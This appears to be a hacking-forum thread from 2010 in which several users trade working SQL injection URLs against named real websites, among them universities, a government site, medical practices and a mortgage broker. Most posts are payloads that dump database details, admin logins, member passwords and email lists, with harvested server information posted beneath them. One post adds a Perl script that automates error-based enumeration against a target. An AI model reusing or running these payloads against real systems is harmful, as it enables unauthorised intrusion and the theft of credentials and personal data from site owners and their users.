http://www.wifiarab.com/module.php?id=-5+union+select+concat_ws(0x3a3a,version(),user(),d atabase(),@@version_compile_os),2--+
http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strUsername,0x3a3a,str Password),2+from+tbladmin--+
http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strEmail,0x3a3a),2+fro m+tblemaillist--+
version - 5.0.91-log
user - wifiarab@68.178.254.187
database - wifiarab
os - unknown-linux-gnu
==========================================
And 2 blinds =\
==========================================
Site: http://www.plastic-jeunesse.ru
TIC: 100
PR: 4
http://www.plastic-jeunesse.ru/php/content.php?id=1041+and+substring(version(),1,1)=5--+
version - 5.x
==========================================
Site: http://www.urolocus.ru
TIC: 450
PR: 3
http://www.urolocus.ru/php/content.php?id=219+and+substring(version(),1,1)=5--+
version - 5.x
http://www.torus.com.au/index.php?page=games&id=-53+union+select+1,concat_ws(char(58),user,password ),3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user+whe re+user=char(119,119,119)
user() : www@localhost
version() : 5.0.77
database() : website
OS: Little Red Riding Hood
File_priv : Y
PR-4
This is for the hockey :mad: :mad: :mad:
http://www.bma.cz/forum/forum.php?id=-4+union+sele ct+1,concat_ws(0x3a,v ersion(),database(),user()),3,4,5,6--
Database Version : 4.1.21-log
Database name : bma_cz
User : bma_cz@localhost
OS : pc-linux-gnu
----------------------------------------
http://www.drsteiner.cz/en/detail.php?id=-32+union+select+1,concat_ws(0x3a,version(),databas e(),us er( )),3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version : 5.0.32-Debian_7etch12-log
Database name : drsteiner
User : drsteiner@setebos.czechia.com
OS : pc-linux-gnu
The login and pass for the admin panel are childishly simple ;)
----------------------------------------
http://www.schnauzer.cz/chst_raz.php?id=-4+union+select+1,concat_ws(0x3a,version(),databa se(),us er()),3,4,5,6,7,8,9,10,11--
Database Version : 4.0.24'-Max'-log
Database name : schnauzercz
User : schnauzercz@thor
OS : mandrake-linux-gnu
BrainDeaD
26.05.2010, 23:14
http://www.zou.ru/popup.php?id=-1184+union+select+concat_ws(0x3a,database(),versio n(),user()),2,3+from+users%20--
Database: 111
Version: 5.5.0-m2-community
User: zou@localhost
PR: 4
TIC: 300
found the passwords, but can't find the admin panel. take a look, maybe someone will get lucky.
http://lostandlonesome.com.au/release_detail.php?desc=bart-&-friends-make-you-blush&id=-1+union+select+1,2,3,concat_ws(0x3a3a3a,version(), database(),user()),5,6,7--
5.0.51a-3ubuntu5.4:::lostandlonesome_new:::lostlone@116.24 0.206.16
PR:4
aka_zver
27.05.2010, 11:03
Site: http://www.jazzimpuls.nl
TIC: 0
PR: 5
http://www.jazzimpuls.nl/show.php?id=-79'+union+select+1,2,unhex(hex(concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os))),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34--+
version - 4.1.11
user - jazzimpu_root@localhost
database - jazzimpu_user
os - redhat-linux-gnu
============================================
Site: http://www.doctordavidclark.com
TIC: 0
PR: 4
http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),5,6,group_conc at(0x0b,login,0x3a,pass),8,9,10+from+ddc_admin--+
http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,e mail,0x3a,pass),8,9,10+from+ddc_members--+
http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,u sername,0x3a,user_password,0x3a,user_email),8,9,10 +from+ddc_users--+
version - 5.0.91-log
user - nexdoctordavidDB@208.109.181.160
database - nexdoctordavidDB
os - unknown-linux-gnu
============================================
Site: http://www.gaycity.nl
TIC: 0
PR: 3
http://www.gaycity.nl/shownw.php?id=-351'/*union*/union/*select*/select/**/1,2,3,concat_ws(0x0b,version(),user(),database(),@ @version_compile_os),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32
============================================
Site: http://www.listenlive.nl
TIC: 0
PR: 0
http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,concat_ws(0x0b,version(), user(),database(),@@version_compile_os),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,unhex(hex(group_concat( 0x0b,user,0x3a,password))),20,21,22,23+from+mysql. user--+
http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,now(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,unhex(hex(group_concat(0x0b,user name,0x3a,password,0x3a,email))),20,21,22,23+from+ members--+
version - 5.0.37-log
user - stations@localhost
database - stations
os - unknown-linux-gnu
http://www.4wdsystems.com.au/index.php?id=-1+union+select+1,concat_ws(0x3a3a3a,version(),data base(),user()),3,4,5,6,7,8,9,10--
PR 2
5.0.90-community-log:::wc449836_db:::wc449836_jess@localhost
http://www.grate.ru/index.php?cat_id=-5+union+select+group_concat(0x0b,table_name),2,3,4 ,5,6,7,8,9,10+from+information_schema.tables--
http://www.swiss.org.au/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a3a, version(),database(),user()),10,11,12,13,14,15,16, 17,18,19--
4.1.22-standard-log:::swisst db:::swisst@10.194.10.144
PR 4
edu sites and all that
PR>5
MS_ACCESS
http://www.cortland.edu/polsci/default.asp?page_id=-19+union+select+1,2,3+from+"table"
PR-6
---------------------------------
MSSQL
http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+top+1+@@version+from+inf ormation_schema.tables)--
@@version : Microsoft SQL Server 2005 - 9.00.3080.00
OS : Windows Server 2003
Platform : Intel X86
PR-6
--------------------------------
MS_ACCESS
http://www.ndus.edu/reports/details.asp?id=-245+union+select+1,username,3,4,5,6,7,8,9,10,11,12 ,13,14+from+"table"
PR-6
--------------------------------
MySQL
http://www.rch.org.au/plastic/edu.cfm?doc_id=-5860+union+select+1,2,3,4,aes_decrypt(aes_encrypt( concat_ws(0x3a,user(),version(),database(),@@versi on_compile_os),1),1),6,7+from+users/*
PR-6
--------------------------------
MSSQL
http://www.pace.edu/page.cfm?doc_id=14128&frame=news/read.cfm?id=829+or+1=@@version
PR-7
--------------------------------
MS_ACCESS
http://cooklibrary.towson.edu/getResourcesBySubject.cfm?subjectID=-77+union+select+1,2+from+"table"
PR-7
--------------------------------
http://historywired.si.edu/object.cfm?ID=123+or+1=@@version
@@version : Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Enterprise Edition
OS : Windows Server 2008 (x64)
PR-8
BrainDeaD
27.05.2010, 20:21
I'll modestly continue the school theme :)
http://sch1265.ru/pages.php?id=-28+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5%20--
Database: sch1265_base
Version: 5.0.83-0ubuntu3
User: sch1265_sch1265@localhost
.:[melkiy]:.
27.05.2010, 20:23
PR: 6
http://www.rso.cornell.edu/progressive/articles.php?id=196'+UNION+SELECT+1,version(),3,4, 5,6,7,8,9,10+LIMIT+1,1%23
PR: 6
http://news.mainemaritime.edu/articles.php?id=-26'+union+select+1,2,3,4,unhex(hex(version()))+--+
PR 3
http://tnt.ya1.ru/interesno/gallery.php?id=-27+union+select+1,group_concat(uname,0x3a,upasswd) ,3,4,5+from+users--
aka_zver
27.05.2010, 20:49
Site: http://agenda.gaynews.nl
TIC: 0
PR: 4
http://agenda.gaynews.nl/show.php?id=17349'+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(mid(concat_ws(0x0b,version(),user(),database(),@ @version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32
============================================
Site: http://www.crew4you.nl
TIC: 0
PR: 1
http://www.crew4you.nl/show.php?id=22'+union+select+1,concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os),grou p_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+c fy_users--+&hid=0
http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat( 0x0b,user,0x3a,password),4,5,6,7,8+from+cr_users--+&hid=0
http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat( 0x0b,user,0x3a,password),4,5,6,7,8+from+dg_users--+&hid=0
http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat( 0x0b,user,0x3a,password),4,5,6,7,8+from+md_users--+&hid=0
http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat( 0x0b,user,0x3a,password),4,5,6,7,8+from+dg_clients--+&hid=0
version - 5.1.45
user - forest_music@localhost
database - forest_music
os - redhat-linux-gnu
============================================
Site: http://www.tekcursus.nl
TIC: 0
PR: 0
http://www.tekcursus.nl/website/show.php?formid=2+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(concat_ws(0x0b,version(),user(),database(),@@ version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.12-standard
user - datekcursu_webdb@localhost
database - datekcursu_webdb
os - pc-linux-gnu
============================================
I'm tired of this msaccess, so I'm giving these away =\
============================================
Site: http://www.spokanemarcom.com
TIC: 0
PR: 4
Output of several records with enumeration:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+1,(select+top+1+username%2bchr(59) %2bpassword+from+members)%2bchr(58)%2b(select+top+ 1+username%2bchr(59)%2bpassword+from+members+where +username%2bchr(59)%2bpassword+not+in+(select+top+ 1+username%2bchr(59)%2bpassword+from+members)),3,4 ,5,6,7,8,9,10,11+from+members%00
Plain output with enumeration:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+top+1+1,username%2bchr(59)%2bpassw ord%2bchr(59)%2bemail,3,4,5,6,7,8,9,10,11+from+mem bers+where+username%2bchr(59)%2bpassword%2bchr(59) %2bemail+not+in+(select+top+1+username%2bchr(59)%2 bpassword%2bchr(59)%2bemail+from+members)+order+by +id%00
============================================
+ a couple more sites with this DBMS..
============================================
Site: http://www.martinitiles.com
TIC: 0
PR: 1
http://www.martinitiles.com/item2.php?id=197+union+select+1,2,data,4,5,6+from+ msysaccessobjects+where+type=1%00
============================================
Site: http://www.uni-bright.com
TIC: 0
PR: 1
http://www.uni-bright.com/item2.php?id=167+union+select+1,2,data,4,5,6+from+ msysaccessobjects+where+type=1%00
http://www.ahfeixi.gov.cn/include/news_view.php?ty=1&ID=-11184+union+select+1,2,concat(user(),char(58),vers ion(),char(58),database()),4,5,6,7,8,9,10,11,12,13 ,14--
PR-5
Strilo4ka
28.05.2010, 15:25
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',version(),database(),user(),@@vers ion_compile_os,@@tmpdir,@@datadir)),floor(rand(0)* 2)))--+
5.0.77-community-nt:mostwanted:globaluname@localhost:Win32:C:\WI...
>400 databases
> 40 tbladminuser tables
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',username,password)+FROM+seodata.ad min+limit+0,1),floor(rand(0)*2)))--+
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',loginname,pass,admin)+FROM+resumex .users+limit+0,1),floor(rand(0)*2)))--+
as a little gift:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
#my $proxy="http://xxx.xxx.xxx.xxx:port";
#$ua->proxy(['http','https'],$proxy);
my $i=0;
while(1)
{
my $req = HTTP::Request->new(GET => "http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+SCHEMA_NAME+FROM+information_schema.SCHEMATA+lim it+$i,1),floor(rand(0)*2)))--+");
my $res = $ua->request($req);
if ($res->as_string =~ /Duplicate entry(.+)for/)
{
open(FILE,'>>results.txt');
print "print $i: $1\n";
print FILE "$1\n";
close(FILE);
$i++;
}
else {last;}
}
www.cam-systems.ca/industry-news.php?id=99999999+union+select+1,concat(0x3a,0x 3a,email,0x3a,0x3a,pass,0x3a,0x3a),3,4,5,6+from+tb l_account+limit+1,1%23
www.redebemreceber.com.br/news.php?id=999999+union+select+1,2,3,4,concat(0x3 a,usuario,0x3a,senha,0x3a),6,7+from+usuarios%23
www.shereno.co.za/news.php?id=9999+union+select+1,concat(0x3a,login, 0x3a,passwd,0x3a),3+from+cmsusers%23
aka_zver
28.05.2010, 17:16
Site: http://www.mortgagebrokers.com
TIC: 0
PR: 4
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,concat_ws(0x0b,version(),use r(),database(),@@version_compile_os),group_concat( 0x0b,users_name,0x3a,password,0x3a,email),6,7,8+fr om+lime_users--+
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,emai l),6,7,8+from+filogix_brokers--+
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,logi nname,0x3a,password,0x3a,email),6,7,8+from+mb_minv is_user--+
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,last name,0x3a,password,0x3a,email),6,7,8+from+mb_realt or--+
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,last name,0x3a,password,0x3a,email),6,7,8+from+pm_users--+
version - 5.0.27
user - alexhad@localhost
database - alexhad
os - redhat-linux-gnu
==========================================
Site: http://www.thelodge-scotland.com
TIC: 0
PR: 3
http://www.thelodge-scotland.com/cms.php?id=32+union+select+1,2,concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os),4,5--+
version - 4.1.22-standard
user - thelodge_lodge@localhost
database - thelodge_test
os - pc-linux-gnu
==========================================
Site: http://www.doctorrbrand.com
TIC: 0
PR: 0
http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),group_concat(0x0b, username,0x3a,password),4,5+from+admininfo--+
http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,now(),group_concat(0x0b,user_name ,0x3a,password,0x3a,email),4,5+from+user--+
http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,now(),group_concat(0x0b,email),4, 5+from+newsletter_subscribers--+
version - 5.0.37-log
user - mydoctor@localhost
database - dronline
os - portbld-freebsd6.1
http://profile.wow.com/includes/friendRequest.php?userId=527/**/union/**/select/**/1,2+from+mysql.user/*
or
http://profile.wow.com/guild/?id=0+union+select+1+from+user/*
or
http://profile.wow.com/includes/friendRequest.php?userId=99+and+1=if((select+subst ring(version(),1,1)<=5),1,(select+1+union+select+2))
blind-sqlinj
user(): wow_rw@305.1
database(): wow
version(): 5.0.41-log
table:users
---> column : imageId
---> column : nameUrl
---> column : bio
---> column : beta
---> column : buddyIcon
---> column : sns
---> column : banned
---> column : admin
---> column : date
---> column : name
---> column : private
---> column : email
---> column : newUser
---> column : guid
---> column : betaSigned
---> column : userId
---> column : entryDate
---> column : status
---> column : facebookId
Thanks to Pashkela and Jokester! :)
and here is the site itself :)
http://www.baytnet.com/dynamic.php?id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Pas sword),1),1),4+from+/*!baytnet_baytdb.member*/
user() : baytnet_baytuse@localhost
version() : 5.0.90-community
database() : baytnet_baytdb
datadir : /var/lib/mysql/
OS : pc-linux-gnu (@@VeRsIon_cOmPile_Os :) )
PR-3
user:version:database = roaauser@localhost:5.0.45-log:roaa
PR 6
403 http://www.romarch.org/admin/ :(
http://www.romarch.org/pags.php?id=-18+union+select+1,group_concat(user,0x3a,pass),3,4 +FROM+users--
+
Communists
http://magkprf.ru/news.php?id=-615+union+select+1,2,3,4,group_concat(COLUMN_NAME) ,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_N AME=0x7573657273--
http://www.clubmayak.ru/press.php?code=-4+%75%6e%69%6f%6e+%73%65%6c%65%63%74+concat_ws(@@v ersion,user(),database(),@@version_compile_os),2,3 ,4,5,6+--
e-shop
http://www.fashionbootsite.com/products.php?id=-2+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9+FROM+admininfo--
http://www.readplus.com.au/blog_detail.php?id=-1+union+select+1,concat_ws(0x3a3a3a,userid,passwor d,email,superuser),3,4,5,6,7,8,9,10+from+readplus_ login--
PR 5